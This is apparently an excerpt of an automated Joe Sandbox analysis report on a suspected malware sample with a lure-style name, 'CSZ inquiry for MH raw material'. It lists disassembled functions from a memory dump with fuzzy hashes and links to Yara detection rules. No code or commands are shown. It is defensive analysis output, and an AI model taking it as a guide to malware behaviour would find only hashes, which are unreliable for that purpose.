                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bd90547c9c733ed3b133ffadd685265b38e679b67176042976108e371d2f1392
                                                • Instruction ID: b2fd88da98c1777f35ac44df615f94334413ed937616ecef80eed31c152f7698
                                                • Opcode Fuzzy Hash: bd90547c9c733ed3b133ffadd685265b38e679b67176042976108e371d2f1392
                                                • Instruction Fuzzy Hash: EE71B2356046428FE316DF28C480B6AB7E5FF84310F1589AAE899CF39ADB34DC45CB91
                                                Function 015C70E9 Relevance: .2, Instructions: 201COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1c42f4711b1043bc84a296baf9e3797ac110c957e3d63fee55b797fac69adf1f
                                                • Instruction ID: 1025e3b66d90a77fe19f8c29997e4266595b9d37d3ae158137758e74e547bba9
                                                • Opcode Fuzzy Hash: 1c42f4711b1043bc84a296baf9e3797ac110c957e3d63fee55b797fac69adf1f
                                                • Instruction Fuzzy Hash: F261C871E002179FDB15AEE9C8859BFB7BABF98A00F10442DE9119F640EB74DA41CF90
                                                Function 015BF0CC Relevance: .2, Instructions: 199COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cee13445cf9ea138a612add4fd36295baa6f80224dd9c8b2a54dea1576bc7489
                                                • Instruction ID: 64c9740ba7edcc3fe1dcc05f2f2a91909244f412fcd2ee07438f1ac1c2951db7
                                                • Opcode Fuzzy Hash: cee13445cf9ea138a612add4fd36295baa6f80224dd9c8b2a54dea1576bc7489
                                                • Instruction Fuzzy Hash: 54716779A01622DBDB24CF5AC8C01BEF7F1BB85704B65486FD9929F240D370E991DBA0
                                                Function 0158035C Relevance: .2, Instructions: 198COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                • Instruction ID: c00fea075e875d066248d061fb9d582614ad7beb276bdd98fd322c25d87d422e
                                                • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                • Instruction Fuzzy Hash: 13718271A0061AEFDB11EFA9C944EDEBBB9FF84314F104569E545BB290DB30EA05CB50
                                                Function 015962A0 Relevance: .2, Instructions: 198COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1085a6a253e663ada55b3c5009d71926d85cdb279bd302de605eaccb19fdba8a
                                                • Instruction ID: 56bf8257d2771df004d75b40289fd2cc12be007adbd2a175662b2f7dc04da5fa
                                                • Opcode Fuzzy Hash: 1085a6a253e663ada55b3c5009d71926d85cdb279bd302de605eaccb19fdba8a
                                                • Instruction Fuzzy Hash: 6971F531100B02AFEB32DF58C894F5ABBE6FF80764F154918E2598F2A1D775E948CB51
                                                Function 015C7A46 Relevance: .2, Instructions: 193COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4a2194d3b09efe2a16c201426a773cb7810b0884aa82de52c0d127303383c666
                                                • Instruction ID: dfb273f25ebb1660b286fabc4457e09f72b6979051e2800e5a09366e3a6dd5cc
                                                • Opcode Fuzzy Hash: 4a2194d3b09efe2a16c201426a773cb7810b0884aa82de52c0d127303383c666
                                                • Instruction Fuzzy Hash: 7A513875A001265FCB149FADC880ABEBBE2FB8CA14F15415DE955DF784EA34C942CBA0
                                                Function 015D8324 Relevance: .2, Instructions: 192COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6b94b3b9de66574dd7b8d1cae283cddcb21fb421902c8f9314b0091464973ba7
                                                • Instruction ID: 633d590aa9d424fe56ba62d95fb3c1b2e10fecef6d88748848576030cadfd750
                                                • Opcode Fuzzy Hash: 6b94b3b9de66574dd7b8d1cae283cddcb21fb421902c8f9314b0091464973ba7
                                                • Instruction Fuzzy Hash: 05710B71E0021ABFDB26DF98CC41FEEBBB8FB44354F104559E614AA290D774AA45CBA0
                                                Function 015C132D Relevance: .2, Instructions: 188COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f3097d90dc9448d7d48a40e6830bccb604f64374c9d7b97d0d1b413c7ebb8360
                                                • Instruction ID: c1007895021979fdc3ba06ad93829d19217647c65a07a63edb4360bc5c03e47c
                                                • Opcode Fuzzy Hash: f3097d90dc9448d7d48a40e6830bccb604f64374c9d7b97d0d1b413c7ebb8360
                                                • Instruction Fuzzy Hash: 78815A75A00606DFCB09CFA8C590AAEBBF1FF98300F1581ADD859AB355D734EA51CB90
                                                Function 015BA250 Relevance: .2, Instructions: 184COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 620a0bcd9c620a3146ae5378db879646e229eb12d6fa677e101892aafa755620
                                                • Instruction ID: bcd785b058a64c29fbc3dbcd46a8308b516e1bc22f153fc600b891310c0f1b77
                                                • Opcode Fuzzy Hash: 620a0bcd9c620a3146ae5378db879646e229eb12d6fa677e101892aafa755620
                                                • Instruction Fuzzy Hash: AF51BF72504712AFD712DE68C884E9BBBE8FBC5754F010929BA40DF150E774ED05C7A2
                                                Function 015CCE93 Relevance: .2, Instructions: 172COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: adaef8c90542e90ae6fae2448e28977f4ff712f71b9da8e8631f75b3b546fe51
                                                • Instruction ID: b80a2ee86b1ac2a72814a62e1bd7e996f11231189f9c7669f512e7811101584a
                                                • Opcode Fuzzy Hash: adaef8c90542e90ae6fae2448e28977f4ff712f71b9da8e8631f75b3b546fe51
                                                • Instruction Fuzzy Hash: 265114326046034FD711DFAD885076FBBE6BFD1A50F19846DE9A9CF246DA30D8058B91
                                                Function 015A8350 Relevance: .2, Instructions: 161COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6e2c04fbf301e62105b2fb1700b533438236e108587b3ffbea4edb9bc117bc48
                                                • Instruction ID: bf4d22e8c5d79e0748bf635ce1a66d10b619cfc57e4140e60c1ebad90ec62a46
                                                • Opcode Fuzzy Hash: 6e2c04fbf301e62105b2fb1700b533438236e108587b3ffbea4edb9bc117bc48
                                                • Instruction Fuzzy Hash: 8C51C170940706DFD721DF9AC880AAFFBF8BF94714F504A1EE2929B6A0D7B0A545CB50
                                                Function 0153E443 Relevance: .2, Instructions: 158COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2601e580780944cf90c61fac0b928b417575962968ce17a7c6095bd79fe26689
                                                • Instruction ID: 8dc871f220657634a7424cf7cb645f75561c40f93d58fb48f5cfae3c7a81af84
                                                • Opcode Fuzzy Hash: 2601e580780944cf90c61fac0b928b417575962968ce17a7c6095bd79fe26689
                                                • Instruction Fuzzy Hash: 91519F71200A06DFDB22EF69D991F6AB3F9FF98758F410829E5519B260E730ED50CB60
                                                Function 015A4180 Relevance: .2, Instructions: 156COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 491c07cc96dfb0d6601f06ab8d3e87f79742322be4b53d8604d22cd4b914decb
                                                • Instruction ID: 4f1facb0bd46896bc8c434cae3201775e0d97e7965c1402f950111e60178cea3
                                                • Opcode Fuzzy Hash: 491c07cc96dfb0d6601f06ab8d3e87f79742322be4b53d8604d22cd4b914decb
                                                • Instruction Fuzzy Hash: BF5189716483029FD750DF69C880A6FBBE5BFC8208F88492EF589CB250EB70D945CB52
                                                Function 015245B1 Relevance: .2, Instructions: 156COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                • Instruction ID: cd9a3bb8c00edde19235c65bbd9074ccbd7c5672893f626b3a7bff7c34c0929a
                                                • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                • Instruction Fuzzy Hash: 53517172E0022A9BDF15DF94C440BEEBBB9BF46754F044069EA11AF280D774DD45CBA0
                                                Function 01583A6C Relevance: .2, Instructions: 156COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 45f4a6923abca38b53130fa48c9bdf0eab02d3bdce71ee7d2c82274393bf119b
                                                • Instruction ID: de7a308797dcb568d5e40a3655d750b73b66ac00c65bc72307fa9f86767cbf00
                                                • Opcode Fuzzy Hash: 45f4a6923abca38b53130fa48c9bdf0eab02d3bdce71ee7d2c82274393bf119b
                                                • Instruction Fuzzy Hash: 61518C72E4051D4BEF25CA58D461BEFB3F2FB80310F44081AFA55BF3C0C6A6A94AD650
                                                Function 0157D800 Relevance: .2, Instructions: 155COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 93bdd4dfbb760ed9eab62819147a9195b2bf55798cb154f34fd31b1322f185d6
                                                • Instruction ID: 5e045764216b682cb2b144a4a94c7397795f869e8fcb318a6390d1885d887024
                                                • Opcode Fuzzy Hash: 93bdd4dfbb760ed9eab62819147a9195b2bf55798cb154f34fd31b1322f185d6
                                                • Instruction Fuzzy Hash: 0251CE71A00216ABDB14DFADD481ABEBBF5FF85700B0441AAE985DF680E734D950CBA0
                                                Function 0158E9E0 Relevance: .2, Instructions: 154COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                • Instruction ID: 62a0e998f047abf0d74e9cb75f770d37bd9dda34116eae1e597bc8dfc9961e8d
                                                • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                • Instruction Fuzzy Hash: 6E51B531D0021AEFEF21BA94C886BAEBBB5FB40725F154665E9127F190D7709E418BA0
                                                Function 015C7571 Relevance: .2, Instructions: 153COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b9f8ff8d5effb1c459b826697c362f1181f9edcef4a69dd8fd58d55891882d16
                                                • Instruction ID: 247d973061760ee53dc75183550419047b75e6a849202b07efddb61e23a228b7
                                                • Opcode Fuzzy Hash: b9f8ff8d5effb1c459b826697c362f1181f9edcef4a69dd8fd58d55891882d16
                                                • Instruction Fuzzy Hash: ED510431A0011A9FCB159FA8C844A7EBBF5FF88744F05412DE911DB680DB70AE45CF80
                                                Function 015C8B28 Relevance: .2, Instructions: 152COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e501e72eba3b2f379cc0609539aa793b521a5b5aff05fc58419eec8737110a87
                                                • Instruction ID: 181e3ba43f92ea8e8da3864cc87ecc75a2e16d852b933a5789c54b3ee17de684
                                                • Opcode Fuzzy Hash: e501e72eba3b2f379cc0609539aa793b521a5b5aff05fc58419eec8737110a87
                                                • Instruction Fuzzy Hash: 8C41C2707016129FD729DFADC894B7FBB9AFF90A24F08862DE9158F281DB74D801C691
                                                Function 0158CBF0 Relevance: .1, Instructions: 148COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f858f582a49e853edbbb3b71ba7536de206704568cb6e53a2c1cefc34e141e59
                                                • Instruction ID: c1c1fe702d4c7f8b8500895c1b3c42950af36f6ce8eb7e75157dce83d2459e5f
                                                • Opcode Fuzzy Hash: f858f582a49e853edbbb3b71ba7536de206704568cb6e53a2c1cefc34e141e59
                                                • Instruction Fuzzy Hash: 08517C71901216DFCB20EFA9C98099EBBF9FF88354B51851AD556BB304D730AD05CFA0
                                                Function 01585BF0 Relevance: .1, Instructions: 145COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e87af914ea9b5af9958d6a0a3b0fc3e50cf32a5abb218012acf4b44e8430fa52
                                                • Instruction ID: 887000f3920b0b861e24845f369eb0bd0908a81aced012dc1028195112075cd1
                                                • Opcode Fuzzy Hash: e87af914ea9b5af9958d6a0a3b0fc3e50cf32a5abb218012acf4b44e8430fa52
                                                • Instruction Fuzzy Hash: 6B410631B612079BCB26FFB9C85266E76E1BF94611F11052EE902FF244FE7489018B91
                                                Function 0153A430 Relevance: .1, Instructions: 139COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 64e54c9c7c94180fd0aaa9f5efb27d08894119f52d0dcc006f87569bf2660bf8
                                                • Instruction ID: f9fef074cf4fd374a384d73c271cb0a0a2e7ac0760ed026e24362caa6bc2fd26
                                                • Opcode Fuzzy Hash: 64e54c9c7c94180fd0aaa9f5efb27d08894119f52d0dcc006f87569bf2660bf8
                                                • Instruction Fuzzy Hash: 83411575640A029BEB26EF6DE881F6E37A5BBD5308F02042DFE02DF242DB7198049B50
                                                Function 015CA9D3 Relevance: .1, Instructions: 139COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                • Instruction ID: 5f608bb984a0e4fbe28130f9fc9fdee4673aba7a9d41f13712646bd83d1acdcb
                                                • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                • Instruction Fuzzy Hash: 4B41E67260171A9FD725CFACCD80A6ABBE9FF80614B05462EE9128F644FB70ED04C790
                                                Function 015301F8 Relevance: .1, Instructions: 138COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f165dd688aa4cead235ccc7a39188f69722f188f253d6160c122e8a996b37f20
                                                • Instruction ID: 1248ba797cdf8a7b4579b9dea5ecb72b25a343151dcf9c61dafd549f320b4861
                                                • Opcode Fuzzy Hash: f165dd688aa4cead235ccc7a39188f69722f188f253d6160c122e8a996b37f20
                                                • Instruction Fuzzy Hash: C941AC3690031A9BDB14DF98C440AEEBBB5BF89714F15816AF815EF280D7359D41CBA4
                                                Function 0152EBFC Relevance: .1, Instructions: 138COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0e16284695606fe78643e728621f3bed3db0dcc270c9221151c0098da7262c1a
                                                • Instruction ID: 317d6062f9495844531444d4eaa517d241d69e1765d444d2caaac13b5ceb6794
                                                • Opcode Fuzzy Hash: 0e16284695606fe78643e728621f3bed3db0dcc270c9221151c0098da7262c1a
                                                • Instruction Fuzzy Hash: 2F41E2726003029FD725DF68C881A6BB7F9FF99224F11482EE557DF255DB30E8448B90
                                                Function 01542750 Relevance: .1, Instructions: 137COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                • Instruction ID: 8556cfd47a333a09ecc5421df21fa4537f5f52ec1d093d6b7dc75517d3bdc106
                                                • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                • Instruction Fuzzy Hash: BD517A75A00219DFDB15CF98C481AAEF7F2FF84710F2881A9D915AB355D730AE82CB90
                                                Function 01506154 Relevance: .1, Instructions: 133COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fadfcbfcdb41ad99105ac00009ae8d6c60f2d8a0cbd76d970eea74f1ea1fb408
                                                • Instruction ID: 42ec459ca7092699fe1d584012e16efd09f3eb1b84be24c5bc2570050acd002f
                                                • Opcode Fuzzy Hash: fadfcbfcdb41ad99105ac00009ae8d6c60f2d8a0cbd76d970eea74f1ea1fb408
                                                • Instruction Fuzzy Hash: 5851C4709002179FEB269B68CC40BACBBF5FF51314F1482A9E5299F2D5D734A991CF80
                                                Function 01500BCD Relevance: .1, Instructions: 130COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 817a0fdbbff11aa7b93619798243ba7b3a08196d2ed1c6d1f6a3fa5ca605fc83
                                                • Instruction ID: 031208164edcdd0fed19c422cd46808e85ccdd3953101b61a138ee5f4a422434
                                                • Opcode Fuzzy Hash: 817a0fdbbff11aa7b93619798243ba7b3a08196d2ed1c6d1f6a3fa5ca605fc83
                                                • Instruction Fuzzy Hash: 7541A571A402299FDB62DF68C941BEEB7B4FF45750F0500AAE908AF281D774DE81CB91
                                                Function 015C866E Relevance: .1, Instructions: 129COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                • Instruction ID: 30cfc782f71a827cf20b21d6587e8dcccc155a6bdd9bb39758ade7976c5ec6dd
                                                • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                • Instruction Fuzzy Hash: 49418275B00106AFDB15DFD9CC84AAFBBBABF98A10F24406DE5049B341D775DD4187A0
                                                Function 015CF0E0 Relevance: .1, Instructions: 129COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f627e70cd04b4eba650035cc8a9da27e31505f4e881d0eb9733da24be75d125a
                                                • Instruction ID: 840a3551f56f5695169b8f4e5d87cf5254a6629ffc1a2f9bd92b92ec693e110e
                                                • Opcode Fuzzy Hash: f627e70cd04b4eba650035cc8a9da27e31505f4e881d0eb9733da24be75d125a
                                                • Instruction Fuzzy Hash: 0841C1712083419FD704CF69D8A587ABBE2FFC5625F05896EF8958B392CB30D819CB61
                                                Function 01500887 Relevance: .1, Instructions: 128COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1a760b1907280527c1f497d0a803804ae5872278fba31f1136e28cb1a275742b
                                                • Instruction ID: f535daa39cbbd4526067c1483c68d8efdd94546bf879b4066788f57f546aa197
                                                • Opcode Fuzzy Hash: 1a760b1907280527c1f497d0a803804ae5872278fba31f1136e28cb1a275742b
                                                • Instruction Fuzzy Hash: 5241AF70600B029FE726CFA8C480A26B7F5FF89254B144A6EE5478FAD0E730E945CB90
                                                Function 015AD5B0 Relevance: .1, Instructions: 128COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ecffe8219595181e8923ea207a0d2d6d5dccd1aba1d8c1cb0570ebf7d88f17e7
                                                • Instruction ID: ccfcf746e98a631b1b6f61e30d537748a071a8647e1ec4b61695de4c55d9ced0
                                                • Opcode Fuzzy Hash: ecffe8219595181e8923ea207a0d2d6d5dccd1aba1d8c1cb0570ebf7d88f17e7
                                                • Instruction Fuzzy Hash: 8B412030A082959FCB15DFA8C481ABEFBF1FF49300F458889E5C58F646C734A456DB60
                                                Function 0152A470 Relevance: .1, Instructions: 127COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 443702ca12c3bdf4de3195c9a6e1a31a27b7c2c367358c8e1825da91a0182075
                                                • Instruction ID: a6a064046f57e730f1db5761460c46d85aa3d8bfff678672abff8646afacc16a
                                                • Opcode Fuzzy Hash: 443702ca12c3bdf4de3195c9a6e1a31a27b7c2c367358c8e1825da91a0182075
                                                • Instruction Fuzzy Hash: 4C41DB32A41225CFEF21CF68C8947AE7BB0FB5A320F050559D421AF7E5DB349940DBA0
                                                Function 01508BF0 Relevance: .1, Instructions: 124COMMON
